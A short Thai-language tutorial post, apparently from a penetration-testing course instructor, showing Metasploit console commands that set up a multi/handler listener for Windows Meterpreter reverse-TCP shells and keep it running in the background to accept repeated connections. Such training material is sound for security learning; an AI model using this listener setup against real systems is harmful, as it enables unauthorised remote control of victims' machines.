ก่อนหน้านี้ใน Course Offensive & Detection ที่เพิ่งสอนไปเมื่อวันที่ 25,26 กุมภาพันธ์ที่ผ่านมามีคนถามว่า จะทำยังไงให้ Metasploit Listener รับ connection จาก Client ได้เรื่อยๆ ซึ่งจริงๆก็สอนไปแล้วแหล่ะใน course นั้น แต่เผื่อคนอื่นที่ยังไม่รู้เหมือนกันก็เลยมาโพสต์ละกัน
1. หลังจากที่เราส่ง payload ไปให้กับ Client แล้ว เราก็มารัน Listener เพื่อรอรับ connection (ในกรณีนี้ตัว payload ที่ว่าเป็นแบบ reverse shell นะครับ)
1 2 3 |
(msf) use exploit/multi/handler (msf) set PAYLOAD windows/meterpreter/reverse_tcp (msf) set LHOST 0.0.0.0 |
2. สิ่งสำคัญคือการ set ให้รับ connection ได้เรื่อยๆนั่นคือการ set ExitOnSession และรันของ Listener ต้องทำเป็นแบบ background เราจะไม่ interactive กับ Listener
1 2 |
set ExitOnSession false exploit -j -z |
3. จากนั้นตัว job ของ Listener จะรันค้างไว้ไปเรื่อยๆไม่ว่าเราจะมี connection มากี่ครั้งก็ตาม